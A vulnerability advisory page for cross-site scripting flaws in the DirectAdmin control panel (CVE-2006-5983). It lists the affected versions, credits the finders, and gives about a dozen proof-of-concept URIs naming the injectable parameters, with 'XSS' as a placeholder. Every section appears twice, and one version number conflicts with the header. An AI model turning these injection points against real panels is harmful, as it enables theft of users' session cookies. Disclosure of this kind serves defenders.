DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
BID:21049
CVE-2006-5983 |Info
DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 21049 |
| Class: | Input Validation Error |
| CVE: |
CVE-2006-5983 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 12 2006 12:00AM |
| Updated: | Apr 10 2007 12:02AM |
| Credit: | Aria-Security and DoZ are credited with the discovery of these vulnerabilities. |
| Vulnerable: |
DirectAdmin DirectAdmin 1.28.1 DirectAdmin DirectAdmin 1.29 |
| Not Vulnerable: | |
Discussion
DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions 1.28.1 and 2.29 are vulnerable; other versions may also be affected.
DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions 1.28.1 and 2.29 are vulnerable; other versions may also be affected.
Exploit / POC
DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
Attackers can exploit these issues via a web client.
The following proof-of-concept URIs are available:
http://www.example.com:2222/CMD_SHOW_RESELLER?userXSS
http://www.example.com:2222/CMD_SHOW_USER?user=XSS
http://www.example.com:2222/CMD_TICKET_CREATE?TYPE=XSS
http://www.example.com:2222/CMD_EMAIL_FORWARDER_MODIFY?DOMAIN=demo.com&user=XSS
http://www.example.com:2222/CMD_TICKET?action=view&number=000000044&type=XSS
http://www.example.com:2222/CMD_EMAIL_VACATION_MODIFY?DOMAIN=demo.com&user=XSS
http://www.example.com:2222/CMD_EMAIL_LIST?action=view&DOMAIN=demo.com&name=XSS
http://www.example.com:2222/CMD_FTP_SHOW?DOMAIN=demo.com&user=XSS
http://www.example.com:2222/CMD_SHOW_USER?user=XSS
http://www.example.com:2222/CMD_FILE_MANAGER/xss
http://www.example.com:2222/CMD_FILE_MANAGER/images=xss
http://www.example.com:2222/HTM_EMAIL_POP_MODIFY?DOMAIN=demo.com&USER=xss
http://www.example.com:2222/CMD_ADMIN_FILE_EDITOR?file=XSS
Attackers can exploit these issues via a web client.
The following proof-of-concept URIs are available:
http://www.example.com:2222/CMD_SHOW_RESELLER?userXSS
http://www.example.com:2222/CMD_SHOW_USER?user=XSS
http://www.example.com:2222/CMD_TICKET_CREATE?TYPE=XSS
http://www.example.com:2222/CMD_EMAIL_FORWARDER_MODIFY?DOMAIN=demo.com&user=XSS
http://www.example.com:2222/CMD_TICKET?action=view&number=000000044&type=XSS
http://www.example.com:2222/CMD_EMAIL_VACATION_MODIFY?DOMAIN=demo.com&user=XSS
http://www.example.com:2222/CMD_EMAIL_LIST?action=view&DOMAIN=demo.com&name=XSS
http://www.example.com:2222/CMD_FTP_SHOW?DOMAIN=demo.com&user=XSS
http://www.example.com:2222/CMD_SHOW_USER?user=XSS
http://www.example.com:2222/CMD_FILE_MANAGER/xss
http://www.example.com:2222/CMD_FILE_MANAGER/images=xss
http://www.example.com:2222/HTM_EMAIL_POP_MODIFY?DOMAIN=demo.com&USER=xss
http://www.example.com:2222/CMD_ADMIN_FILE_EDITOR?file=XSS
Solution / Fix
DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
Solution:
The vendor released fixes to address this issue. Please see the references for more information.
Solution:
The vendor released fixes to address this issue. Please see the references for more information.
References
DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
References:
References:
- DirectAdmin Homepage (DirectAdmin)
- DirectAdmin Multiple Cross Site Scription (Aria Security)
- Feature Information (DirectAdmin)